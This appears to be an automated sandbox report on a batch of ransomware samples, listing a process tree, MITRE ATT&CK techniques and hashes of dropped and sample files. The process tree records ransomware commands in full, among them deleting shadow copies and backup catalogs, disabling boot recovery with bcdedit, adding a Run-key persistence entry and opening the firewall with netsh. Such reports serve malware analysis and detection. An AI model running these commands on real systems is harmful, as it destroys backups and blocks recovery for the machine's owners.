C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 208781729891047.bat4⤵PID:11072
-
-
C:\Windows\SysWOW64\attrib.exeattrib +h +s F:\$RECYCLE4⤵
- Views/modifies file attributes
PID:11216
-
-
C:\Users\Admin\Desktop\00436\@[email protected]PID:12460
-
-
C:\Windows\SysWOW64\cmd.exePID:11516
-
C:\Users\Admin\Desktop\00436\@[email protected]PID:14784
-
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet6⤵PID:16060
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete7⤵PID:3560
-
-
-
-
-
C:\Users\Admin\Desktop\00436\taskse.exePID:11920
-
-
C:\Users\Admin\Desktop\00436\@[email protected]PID:6996
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "ovmsvvcyf828" /t REG_SZ /d "\"C:\Users\Admin\Desktop\00436\tasksche.exe\"" /f4⤵PID:16888
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "ovmsvvcyf828" /t REG_SZ /d "\"C:\Users\Admin\Desktop\00436\tasksche.exe\"" /f5⤵
- Modifies registry key
PID:12596
-
-
-
C:\Users\Admin\Desktop\00436\taskdl.exetaskdl.exe4⤵PID:16896
-
-
C:\Users\Admin\Desktop\00436\taskdl.exetaskdl.exe4⤵PID:6380
-
-
C:\Users\Admin\Desktop\00436\taskse.exePID:16276
-
-
C:\Users\Admin\Desktop\00436\@[email protected]PID:15524
-
-
C:\Users\Admin\Desktop\00436\taskse.exePID:14648
-
-
C:\Users\Admin\Desktop\00436\@[email protected]PID:12224
-
-
C:\Users\Admin\Desktop\00436\taskdl.exetaskdl.exe4⤵PID:5980
-
-
C:\Users\Admin\Desktop\00436\taskse.exePID:15648
-
-
C:\Users\Admin\Desktop\00436\@[email protected]PID:12840
-
-
C:\Users\Admin\Desktop\00436\taskdl.exetaskdl.exe4⤵PID:10504
-
-
C:\Users\Admin\Desktop\00436\taskse.exePID:8292
-
-
C:\Users\Admin\Desktop\00436\@[email protected]PID:1048
-
-
C:\Users\Admin\Desktop\00436\taskdl.exetaskdl.exe4⤵PID:9720
-
-
-
C:\Users\Admin\Desktop\00436\UDS-Trojan-Ransom.Win32.Petr.a-6d4c8d50f96df51a6aed547c04728115eea885123167fe18975aa5f965cd8eb0.exeUDS-Trojan-Ransom.Win32.Petr.a-6d4c8d50f96df51a6aed547c04728115eea885123167fe18975aa5f965cd8eb0.exe3⤵PID:7048
-
-
C:\Users\Admin\Desktop\00436\VHO-Trojan-Ransom.Win32.Convagent.gen-00e54d38d942d3924fa15f5dc933cccac57a972101c283e2cf6231ce02bebcc0.exeVHO-Trojan-Ransom.Win32.Convagent.gen-00e54d38d942d3924fa15f5dc933cccac57a972101c283e2cf6231ce02bebcc0.exe3⤵PID:8756
-
C:\Users\Admin\AppData\Local\Temp\klikTower_protected.exe"C:\Users\Admin\AppData\Local\Temp\klikTower_protected.exe"4⤵PID:10908
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\klikTower_protected.exe" "klikTower_protected.exe" ENABLE5⤵
- Modifies Windows Firewall
PID:15224
-
-
-
-
C:\Users\Admin\Desktop\00436\VHO-Trojan-Ransom.Win32.Mbro.gen-837c1b6ede92ed28312d7e444f4896360c65abed2013d52a298fb2a1c62a7f4f.exeVHO-Trojan-Ransom.Win32.Mbro.gen-837c1b6ede92ed28312d7e444f4896360c65abed2013d52a298fb2a1c62a7f4f.exe3⤵PID:7184
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2276 -ip 22761⤵PID:4392
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1600 -ip 16001⤵PID:2308
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵PID:5564
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 224 -ip 2241⤵PID:5304
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:8900
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:2388
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵PID:11932
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Roaming\Windows Defender2⤵PID:11100
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:11100 CREDAT:17410 /prefetch:23⤵PID:6448
-
-
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x304 0x4741⤵PID:5068
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:9968
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost1⤵PID:12148
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s upnphost1⤵PID:9432
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s FDResPub1⤵PID:13224
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\README.1d46f1f8.TXT1⤵
- Opens file in notepad (likely ransom note)
PID:7136
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵PID:15108
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Roaming\Windows Defender2⤵PID:14944
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:14944 CREDAT:17410 /prefetch:23⤵PID:8856
-
-
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵PID:13412
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:10820
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵PID:12664
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\README.1d46f1f8.TXT1⤵
- Opens file in notepad (likely ransom note)
PID:3392
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:4504
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:15476
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:12852
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:4040
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:16924
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:8728
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
2PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Windows Management Instrumentation
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
3Windows Service
3Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
3Windows Service
3Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
File and Directory Permissions Modification
2Windows File and Directory Permissions Modification
1Hide Artifacts
1Hidden Files and Directories
1Impair Defenses
2Disable or Modify System Firewall
2Indicator Removal
1File Deletion
1Modify Registry
4Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.7MB
MD5cf95a5920f0683a5690f23631bc65408
SHA13ec57a219fe524bd0060dd75e70fe048a1e81a19
SHA256cce4eb2b43f135c38145a09d6ebb4fc2bd8c78ae16825ed29c08e52e7ff0c9eb
SHA512aee517882f6607f32323fd1e28826386144d641cba0082ac885c2bfb2579e1bde99b26f0db2395bfb8d656074c93e6e75af0bba24d9bfe5ac9d1961dd72326c3
-
C:\ProgramData\Microsoft\ClickToRun\MachineData\Catalog\Packages\{9AC08E99-230B-47E8-9721-4577B7F124EA}\{1A8308C7-90D1-4200-B16E-646F163A08E8}\Manifest.xml
Filesize3.3MB
MD5390be929f03acdb42bcce8a6b5b1c981
SHA1211af91b9ef7ffb3d51913061a177dd46b90efb3
SHA25678cac598a64c809ae0c6b0da6316768c231e8d64dac49f7353c1f4bc19e30b2a
SHA5121222aa06445827a3374cfb466c2e5cc0e5ba6b2c2063b6a9eb2651cd9ca6cc9e837fb82aa5922067dfe17ae767c3066973ed71aaba2f08cb79957e6ba1d199c2
-
Filesize
2KB
MD5c7e49b2eb9a272f04fa081867e960667
SHA1008a57054c00415d7993b40513b46af7d150b30d
SHA2563603bff416e27088e1c6f6d6c2cb0185b9c695762cd049dc50345334df398c90
SHA5120b140cb5b601a741f9621b0ccf4e9841ac22bf4244dce5e4b04b01157563588fcaa240efb6e50fd6f4f7ddeaf3b968b538e275f0a34eba1e053364b117b436a9
-
Filesize
3KB
MD596ab9266736dd13355c3ffc8bcf1ac35
SHA17861f1a835a77db19632b542cea2685aa5f7282e
SHA2561fb4ade1bfb8b656ffdbe438f4001cb669380acd1d6a174599f9cf03067c8ddb
SHA5125feefce07b23b3a4436dcf93753f8ebc42006ba9f8bb521e38195e532f55b60d4559cdfd6a45b59e42350b585f508dbbe22bc37772a211a0e5eff75661a4ad00
-
Filesize
7KB
MD564cb8dd0a7e51eab28db387d6040fe42
SHA1bb3f283da55fcae45012ff26f7f762e19acdd22a
SHA256c35e2c73cde8b58066b3d4caf5e73ad55ee89436749cef5089330027fcdb415f
SHA51258e4db2d9c98e8de38c1c1a5a7eed590a2786e44dd5e551d65f6a49945a0ded2063b8cf8edcd2b982c51c9f442caf6e5177749b3ebbf9e03585d2177e8d2dcf4
-
Filesize
6KB
MD5353e7329b3a6a66b44613f96e770b0dd
SHA115c004351d32e8b607e81ab4ba813952188d4292
SHA256e76c6cfc8d94cb52a43d5ec8d3bc251099f65196a7c5c33646f9a6ec17906571
SHA512f5d16efa541c9972475e4806124fdae630d8b77d4e6195622cfca5fcb1e4ff6bf7dc694acde7dd3d6dd1f36930e100df1cc1a97258da38998f7eb64aa04f73ef
-
Filesize
5B
MD55bfa51f3a417b98e7443eca90fc94703
SHA18c015d80b8a23f780bdd215dc842b0f5551f63bd
SHA256bebe2853a3485d1c2e5c5be4249183e0ddaff9f87de71652371700a89d937128
SHA5124cd03686254bb28754cbaa635ae1264723e2be80ce1dd0f78d1ab7aee72232f5b285f79e488e9c5c49ff343015bd07bb8433d6cee08ae3cea8c317303e3ac399
-
Filesize
3KB
MD5ac3164165cc30852909606aa1bf64a84
SHA1686d9714f5a6e95e9ab24b651579e9715f6b2ce3
SHA2564643bf0a92a8523762c8d328ed23b959ce72ebe1150ab910e32d6475245c6ee8
SHA51226f85e830a3c0dc0edc613ff404dc675df7daa6e12326e7c71ca466fdea394370406cf17eedc0bdd400799141e9470050f8eeb2657276201f17e3f5daf39b3a7
-
Filesize
64KB
MD5d2fb266b97caff2086bf0fa74eddb6b2
SHA12f0061ce9c51b5b4fbab76b37fc6a540be7f805d
SHA256b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a
SHA512c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8
-
Filesize
4B
MD5f49655f856acb8884cc0ace29216f511
SHA1cb0f1f87ec0455ec349aaa950c600475ac7b7b6b
SHA2567852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba
SHA512599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8
-
Filesize
944B
MD56bd369f7c74a28194c991ed1404da30f
SHA10f8e3f8ab822c9374409fe399b6bfe5d68cbd643
SHA256878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d
SHA5128fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.82.1_0\_locales\en\305E39-Readme.txt.WNCRY
Filesize3KB
MD56041082cc2d840d0e0b2df6a373158f7
SHA14574b2689185e02f5e6ca222e2ad852ebbda497e
SHA256fc8c8bf0d8080e9843c2487e30192164224a9ea6158e329917e19476fa0c310e
SHA5124c5bf2176c26057c324b34a9efe40c91c567fec08e717cc4fab045bd2bf1f47669e9576c060104f3f960091b06642b2bb5fe2758f0921b544a52d5c812c68459
-
Filesize
896KB
MD54c3d4e2b3ab3b840f6d2627eda8c3660
SHA1259da0155a6dd954a4e41b9a37102044dbad15ed
SHA256482d7e9d84092094ebd6f2986c208e6fd0d2cecc857dce8c287e98245c9035c7
SHA5129cae4cfdbc5e9c7d1efdf15527357d8435e2a1332fe7f21a9bf19f5757e87d2e4f4eb38e66d18a8678a493faf7c63107c77abe1852f76c23e7bbed82f826f6a6
-
Filesize
9KB
MD57050d5ae8acfbe560fa11073fef8185d
SHA15bc38e77ff06785fe0aec5a345c4ccd15752560e
SHA256cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b
SHA512a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b
-
Filesize
273KB
MD51d96091dc25660ac8989193299659be7
SHA1bc95772709ad585d528e43de2af29ed0bb628841
SHA256d1a6bd542d3570297f37ef478a638a2c7e04645cfb66fef1abe8210aa41c48a8
SHA5128c47793a478b0aaf12353ee1f1b2883c0a64eba1511889d33a6782e47f0ac8755dc3b594f2a74820f155243f215f015eb216ef62b6500a8fe9cc0d9cbe0baaa2
-
Filesize
17.5MB
MD509b329f091ef3280107b1a0335712164
SHA180c8e1ff112c032c79178a3007316969e42bc040
SHA256966dcb059dac7f6561a55b55bcc17f77ef01bda17406988ab782b2ec73901b55
SHA5124d96f92cee63362ba836c65522b1bb9afef6a1e9f5d5725c31bee0508d0c28c32604a795414ff2ed6cbb3ab14b8384a8c3f77f70df4cfc7a4bdd9f986b07fabb
-
Filesize
138B
MD5c6a2f862f1b18abd9c133acac614cca8
SHA1d2f2d302fa4cff80f6f1e49db3368c9dca9cff75
SHA2568294a56e1548e2b56720000b48a64384cc19b2e23e121108dd49352a1d68cade
SHA5122afbacf9cb2c24a5854e4d211401cada2acb46c99e14692b4f3243ef67e00da1389fa62cbd0580d2abf9cdfce5c7a36a76f5c93838bc4212fb3502e1519c9d08
-
Filesize
73B
MD5e2b85a4ddadc47d60d0058d712cb655e
SHA1680af7e70f0842e9dac3e3c23da6ac28cbab586c
SHA25613a53af0b6d8a425705b48bc8196e3b07e0660b3e0240d168d4a9584b80e4bbb
SHA512c8d538cfbd45a1ff8393cfa904e1ce038a1d9daf0c7d91179c5fe841b6739a24e4405f09d9e96360cce09d201b50b8186f9f3279b782fca6e0459808c338c1fa
-
Filesize
256B
MD5d869d35b2aca57be0e242075b751b9d9
SHA199d4bd4d55ebb26766eafc4603c86594c46ffbb7
SHA256c718f63ccac92db0a68390ebf9813c80ab0c83fffb12cf6a8f73049f14b0ceb4
SHA51232ca685ff2783b4b1e61a3bb431d6e4bea0363e152e9108d7b37e0a416fe1659fd165b53e3f6bcf3c0c163bd77f4e8109610be934f76e162fc6d13f5b4b83392
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.1MB
MD53f8089378720b936b55608fee5eb9e9d
SHA173fa2cd5b27e5bc9568a1ebfb95e7646f7ee2a4a
SHA2560d559136ad9c0e8b3275caf54271cbf22db7bfa7a1602d9a576437e0a8bc2044
SHA51232f679b04598b884173efa2d30cf4bfb8e35177018d3b00350ea42a52594fde0dfc7aba1492061e10cb07d51b33f5f488ad69ee51f70fdc94bf6861350e938c0
-
Filesize
512KB
MD5064d499d2cab83fd08c090af229dae20
SHA129a930848efc1d00a51d1693e89ab0f6388e0dd7
SHA256c02860bdf001ce70c0e77e124fd8d1415a9a1e73066f4e99ade3dedb6fa3b0da
SHA512e30626a6d174bc790b775282b0d60cebddb19b955a4a69455b432687498dfa8cc5ecda91e02e1028bfe8a0b28d30736d29a9f2fb2b2f4f04e51410e4b93496f8
-
Filesize
230KB
MD59cb07c427872ebc5e327227f329ea4a3
SHA108140a54f71b222fac5b033476e8413e1f02390c
SHA25669e60f995d9ff239196f6d7b5e9bf3110de5d2e82392ffe7361e6a9631d1f19e
SHA5121348af8a85e16a9ab7fb608856db23b20784b3068d0619dc31d3880cf428895ad1f0415bd1d5fbf0a8dc88ce3784c58f4891247ca77712c271e88b5111e05fb8
-
Filesize
16KB
MD5b707b561fa36b7be5f6b8be240a917cc
SHA11d9acc1e73c649bbcd2bb6dc3cda421720be8f7a
SHA2566e296cc3ff24e77b665bad8c4652feb9e2d8f32033dbf4cbf7ef0466b76dda4d
SHA5123e28ce26e4f8fcdcb37dba2069a38696848e7fbec14338cfb8c5295fb94859787381d0be03ef2ad0823dc1f2bf7afc89e369288e36cbb36f74147f2da0cc1098
-
Filesize
7KB
MD57510c411413f257a23ecefe842ed3ed5
SHA18545116a3113076b13c4cd2c7efe7bc14f262230
SHA256ff4d62429aee877e8bb7c7c84f5b85dbd0df4283b04ae875426e2aff415047ad
SHA5129e826e5356d6c390cfdf4ce19a2856a4fe410698154185bf4a8007da712acd4be389c46f476aa50185a82cba40924e1e1f2f9db2a0dc331cbf6d0e71d1657355
-
Filesize
318KB
MD54ea3c3a2afa6d22c1ffb8234c02541de
SHA148b4b0644ccdd46c7775b27113bcbd8bcb2650dc
SHA256cc3df53f8baf7109fcee29d12091e2e268c5632d67a9dd03ef42cc3d6e76dc9b
SHA5120a43b7bfa0133557e2e845109d9fc25804b3b081764495b0a3a60227b2556acec966486653ed32688937d3555207afc8372d3fb938d30a55e5bdc6a1657226b6
-
C:\Users\Admin\Desktop\00436\@[email protected]
Filesize933B
MD57a2726bb6e6a79fb1d092b7f2b688af0
SHA1b3effadce8b76aee8cd6ce2eccbb8701797468a2
SHA256840ab19c411c918ea3e7526d0df4b9cb002de5ea15e854389285df0d1ea9a8e5
SHA5124e107f661e6be183659fdd265e131a64cce2112d842226305f6b111d00109a970fda0b5abfb1daa9f64428e445e3b472332392435707c9aebbfe94c480c72e54
-
Filesize
5.7MB
MD57ac078a4c0a0c82464f31418b512cad7
SHA1edafdb4391106484521c3a76890690ee525a9d68
SHA2568c8d6d7a1c6ce3ae445a85b32aac61eef74d00effcaaac0379d33cd299008418
SHA512e5c6cff838a20a0130ed42b170fdd0fcca3491dd65ffb4ced4612b8c8598b3083172f3218a5471c22ffdd6189f748c22e6c7b9417a775344b04956fa2e141507
-
C:\Users\Admin\Desktop\00436\HEUR-Trojan-Ransom.MSIL.Blocker.gen-649d5c728c759d6185e1420b9eeaeb370ae7c080782b7a0565cedb7b53c2c50d.exe
Filesize114KB
MD55ea955bf05a76d42bf503ae3886493d7
SHA1355837f97cd14734665cb911ecc000bd15ce9987
SHA256649d5c728c759d6185e1420b9eeaeb370ae7c080782b7a0565cedb7b53c2c50d
SHA512b2e46a5217f90a32a4319817af26bd7b281fd3d7f4d5ca39d95ff9e6ab71b1a6e86828c2f156fc675418d5ed594e1822816ecf0c3893cc3b787d4406525b487f
-
C:\Users\Admin\Desktop\00436\HEUR-Trojan-Ransom.MSIL.Blocker.gen-a1d6d6618d366d7f5e4f2eef7ed3d5f195b6ea591ea3067270a34f67d2ca2de6.exe
Filesize2.2MB
MD5b41914b478ac2fdde9e6f0e9017abf62
SHA1418c5df9f24f10962cd0436b790de445ee09d0be
SHA256a1d6d6618d366d7f5e4f2eef7ed3d5f195b6ea591ea3067270a34f67d2ca2de6
SHA512b55a453f47d845992d10ce503c9e3e8d9703b108723a97532c2d43eb6670561438c610de458bd39ad22e1c996b7e3b633d7b579e55d7dc55919e592ddc3da40c
-
C:\Users\Admin\Desktop\00436\HEUR-Trojan-Ransom.MSIL.Blocker.gen-cebc7e39289aece621aee501077f89afb9d47e26453e940e0c111246e2bf84e8.exe
Filesize2.2MB
MD595a22b36ce183a57c12440e6237bd66b
SHA1ffb6c6660a54fe8224329451dbf1dbb21395c619
SHA256cebc7e39289aece621aee501077f89afb9d47e26453e940e0c111246e2bf84e8
SHA512d5c5f89c88c04411e329ca0469ab93ba958de87154dfad32850ce03bf25117cd11d66dc1283f8abca9eae0392ceec414848de85826e5f707c717d17815a8d1f8
-
C:\Users\Admin\Desktop\00436\HEUR-Trojan-Ransom.MSIL.Encoder.gen-fb81347ec3a8abc5259abd425aa435ab166eb69a5c76baef19ae23f6455c1484.exe
Filesize121KB
MD5b63b303104834ab8ecfe01e51e4dcbc2
SHA17da977bf4453278a2834f3d122130a9fd75cd3c6
SHA256fb81347ec3a8abc5259abd425aa435ab166eb69a5c76baef19ae23f6455c1484
SHA512e0f8e5c9c26ce8fba086d0ddaf9e40cea5dadc1d05bfe458b5e1e9606db8a58308bf261fcf6ca944123ef93b8cae35933bb10a342d36c76cc54ba39d2b873e10
-
C:\Users\Admin\Desktop\00436\HEUR-Trojan-Ransom.MSIL.Foreign.gen-f0c73e683743fcaf091322ee875d7bd76475adfb86d80af384d809177b945696.exe
Filesize9.6MB
MD513e4eadc6825354a19b5d834aaa626f1
SHA1c2a7e3a081184b3d3e7e1faf0a40327a2bf53025
SHA256f0c73e683743fcaf091322ee875d7bd76475adfb86d80af384d809177b945696
SHA5129f6fafd13df43b6141b499b47aa1935bd98d69da2af8e6c03dec3adb7676e85fe83f8620ccdecbeb5d02dee3fc94502db5174c09f07dd3841e164346030fb841
-
C:\Users\Admin\Desktop\00436\HEUR-Trojan-Ransom.MSIL.Gen.gen-0a18a0f93588ad4d852d50ec68f594b21babcb9889b90f2134e2f04f82f8b6b0.exe
Filesize18.1MB
MD5fd239bc5b3e06822e9a42de4dd940177
SHA1167a0595a73be9fc87479af39d0669ac1207b2f2
SHA2560a18a0f93588ad4d852d50ec68f594b21babcb9889b90f2134e2f04f82f8b6b0
SHA5122f0b0dab4e0b87a89a231458bbf9bace8db14298c148a5057eb02c0f598eab0bbf5c2d5fb6cc45ea6a4ff91a1714d0501882544198f273d2a4a9bfa493315fb6
-
C:\Users\Admin\Desktop\00436\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-4b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e.exe
Filesize1.7MB
MD508ce31e52ee4e6f18b8f96245fa0967a
SHA197f01c99aabc01130063afbecdec86d607e03327
SHA2564b0ce2c3039c4ca3c1c3ced6df016da22e19c66cc70901c172659a0c0c1c403e
SHA512d6d4f7652fa892e8143b6d9b2e438aa2d5cbf249ce9f6ee1eab7e0853955fd91bfd20b2875461c8866e05c05a36f2526913f30da6f5d871121bed93b60ba5931
-
C:\Users\Admin\Desktop\00436\HEUR-Trojan-Ransom.Win32.GandCrypt.gen-1af0659e1375552c88339146c38d870f9808fd4bfcf93d026aa0698aa89cdf23.exe
Filesize325KB
MD57da9bc335b7b17de0832a95ef496990e
SHA1f3ec625e92b2cc69593cf33725f84bd4ff784e46
SHA2561af0659e1375552c88339146c38d870f9808fd4bfcf93d026aa0698aa89cdf23
SHA51258bc9cdc842b56a2e4b71632e633cdfb431486ae47af5e46f4b3873176a3ef67b2d8e766db540e01a97e34f55a1ed992eb2a872313e49f13495d2ce73c734d4b
-
C:\Users\Admin\Desktop\00436\HEUR-Trojan-Ransom.Win32.Generic-f15f03025e1c98bfc72c1116e9f06073704073475fa433aeb17179ed8ff95a3f.exe
Filesize138KB
MD5c30965b30dc12700326a61f62f63b2ce
SHA11a53184ae78424fbdb84721dd657b927a90ec6d4
SHA256f15f03025e1c98bfc72c1116e9f06073704073475fa433aeb17179ed8ff95a3f
SHA5124011cbadca619e51d6a5d87772ad5c18dc03091d62babde2be2a8d88eb98030402d29e3e18e8799e2ea068bf894b9d198415e14e5028bb0f8ce0dc28bd96f279
-
C:\Users\Admin\Desktop\00436\HEUR-Trojan-Ransom.Win32.Stop.gen-8a9aa2c6397edec14772b76171a223259ec3190e3cef4cf6774d2eb9435a30f6.exe
Filesize6.0MB
MD506742697011100bf66640751db742f07
SHA1fde640ec957c5b8fedacf1ef4a40b5b96d89c9df
SHA2568a9aa2c6397edec14772b76171a223259ec3190e3cef4cf6774d2eb9435a30f6
SHA512c91215bb00a19475197ee4694fa7a1b6b09b0cf5b62e46fc47c76aa9cc1b42f2c6cb64834ee1856b3a81a44f6320a3765b7ad4b16e1dfdf2e25af90abe13e6d9
-
C:\Users\Admin\Desktop\00436\Trojan-Ransom.Win32.Bitman.aiyl-33265f47eeaf55e96e5e3c3bf600c585dfc1a3c9562e8891342956a6c033d2c1.exe
Filesize1.1MB
MD59da20636dfabfbf14b19f776d99ab40f
SHA1e87cf670e32501f6a02790b6a1d660dfba6bfdea
SHA25633265f47eeaf55e96e5e3c3bf600c585dfc1a3c9562e8891342956a6c033d2c1
SHA512bea172feac8ebf820dcb1f61bd2fb83903e3bd51968a43a4706fcedc1d70ffbbadad69fb8480cb91db5b595d9d00698e03ee4e4370b2928f170064888b1bf322
-
C:\Users\Admin\Desktop\00436\Trojan-Ransom.Win32.Blocker.jhat-2de9dda59b7761de1a9b33641753443c4c3e477fec3bf9b88182062f03ec0608.exe
Filesize376KB
MD5d8997620e7be60aa5cdd184b535b7354
SHA1d397d40a8673be5e9f7a07c0473c88166f3c2b10
SHA2562de9dda59b7761de1a9b33641753443c4c3e477fec3bf9b88182062f03ec0608
SHA51218b0b3e0232e48eba9a6104592568d48df7052084e2326d9ee73ee1a6633d6c2650c5121b67457910781f84b9bb8cf9efd17a1a0531a86c5fdd298c358e8f28b
-
C:\Users\Admin\Desktop\00436\Trojan-Ransom.Win32.Blocker.kpuo-11d1384cb603f6ffceafc24e80508686372659a95c8388c187d992b4d946de24.exe
Filesize196KB
MD5a57d4df9d9c90010723030cb9cf7544e
SHA13a6c2da82e17e773c3d5c8932c3cfb00e5a9704c
SHA25611d1384cb603f6ffceafc24e80508686372659a95c8388c187d992b4d946de24
SHA512891b5230f16869d499ef957267fd593ce03f61f0562336231bb4a1921f16a4552b774984488e1687d8b38a4205a1b760b7abad315a83aaefd744fd22c9d9ff03
-
C:\Users\Admin\Desktop\00436\Trojan-Ransom.Win32.Cryptor.eev-89cc8fa7a2d2fef1b7e292682121cc65dedb8e0d5cd926977dfae49f25410f4c.exe
Filesize7.2MB
MD558d2bde0df64be7a06c5b621ed299751
SHA1e4deff8b829f4a0c3dce3cf107a82bccc6b1a1e5
SHA25689cc8fa7a2d2fef1b7e292682121cc65dedb8e0d5cd926977dfae49f25410f4c
SHA51277b1c6b79f1a9054a5740a6f405667ca1628dc5a640534f1dd8557be2b4e2f5bee11abb3f1acb62bd4de909742b6be12f565f20ac152ff6973781b311ae57c50
-
C:\Users\Admin\Desktop\00436\Trojan-Ransom.Win32.Darkside.m-1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe
Filesize59KB
MD56a7fdab1c7f6c5a5482749be5c4bf1a4
SHA14e6d303d96621769b491777209c237b4061e3285
SHA2561cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb
SHA51239446ebfae1dd0e007e81087f42021b95ee5a0a04e22ca7f4f5addbea4e71c7fe09ffd3bf953400955ce6d31b535c81a37b018aba73c30e61575b2c49414d6cd
-
C:\Users\Admin\Desktop\00436\Trojan-Ransom.Win32.Encoder.mjb-917cf2ed059e7975f294f97be66df901a8d70d6077fc64396a5c9e2bc47b9290.exe
Filesize311KB
MD56d9db091d0dff518b8360e6f4491d03c
SHA116a6fae03c5deca50ba3c72937454c42a5c66b00
SHA256917cf2ed059e7975f294f97be66df901a8d70d6077fc64396a5c9e2bc47b9290
SHA5125d9c03f9cc5521cd0f7e3967a9e8b9a1f92f4a0c1c12ed9484e2fc3dd64df80f7e0e979b42e7542fe73120db157c8dcc3ac0ca6614ec38ee5784bfe562569a7e
-
C:\Users\Admin\Desktop\00436\Trojan-Ransom.Win32.Foreign.nvzm-3e554d5764acaec3baab31ab7ac0d1ffea39dc105435b81cb784fa0ffd0a203a.exe
Filesize300KB
MD510a6992ad77afb3049c58489bdc6534a
SHA1d45ac3087d52cbfd4d39273240e3a964a21ffead
